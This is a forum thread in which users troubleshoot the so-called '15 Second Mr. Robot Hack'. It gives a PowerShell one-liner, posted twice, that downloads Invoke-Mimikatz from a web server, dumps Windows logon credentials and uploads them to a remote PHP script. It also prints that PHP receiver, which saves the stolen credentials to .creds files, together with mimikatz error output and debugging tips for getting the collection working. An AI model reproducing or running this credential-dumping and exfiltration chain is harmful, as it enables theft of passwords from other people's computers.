Jump to content

15 Second Mr. Robot Hack question


Exmix
 Share

Recommended Posts

So thanks to ThoughtfulDev I was able to get this workings very nicely.

So after testing it on mine and my cousinsg Windows 7 PC(With his permission of course), those worked great, but when testing with our Windows 10 PC's, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PC's to make sure it wasn't just those PC's in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.

Link to comment
Share on other sites

On 9/6/2017 at 11:00 PM, kdodge said:

 

Are you sure your running it as Administrator?

100% Positive. I'm doing it from my Windows10 Laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.

Link to comment
Share on other sites

1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway.

I am but that is disabled. I know the AV Detects it.

Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.

Edited by Exmix
Link to comment
Share on other sites

  • 2 months later...
On 9/8/2017 at 11:49 PM, Exmix said:

I am but that is disabled. I know the AV Detects it.

Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.

Windows 10 has patched lsass now which effectively breaks mimikatz functionality.

Edited by TeCHemically
Link to comment
Share on other sites

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: 

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

 

it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
 

Thanks to any who reply!

Link to comment
Share on other sites

On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on


<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

 

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

Edited by TeCHemically
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...